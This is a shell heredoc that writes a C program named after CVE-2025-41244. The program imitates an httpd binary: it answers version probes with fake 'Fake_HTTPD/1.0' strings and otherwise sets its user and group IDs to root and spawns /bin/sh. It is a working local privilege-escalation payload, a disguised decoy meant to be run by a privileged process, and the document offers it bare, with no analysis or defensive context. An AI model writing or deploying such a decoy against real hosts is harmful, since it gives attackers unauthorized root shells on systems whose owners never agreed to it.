cat > /tmp/CVE-2025-41244.c << 'EOF'
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]) {
    // Handle different version flags that real httpd might use
    if (argc == 2) {
        if (strcmp(argv[1], "-v") == 0) {
            printf("Server version: Fake_HTTPD/1.0\n");
            printf("Server built:   2024-01-01\n");
            return 0;
        }
        else if (strcmp(argv[1], "-V") == 0) {
            printf("Server version: Fake_HTTPD/1.0\n");
            printf("Server built:   2024-01-01\n");
            printf("System: Linux\n");
            return 0;
        }
    }

    // Only escalate if run without arguments
    setuid(0);
    setgid(0);
    execl("/bin/sh", "sh", NULL);
    return 0;
}
EOF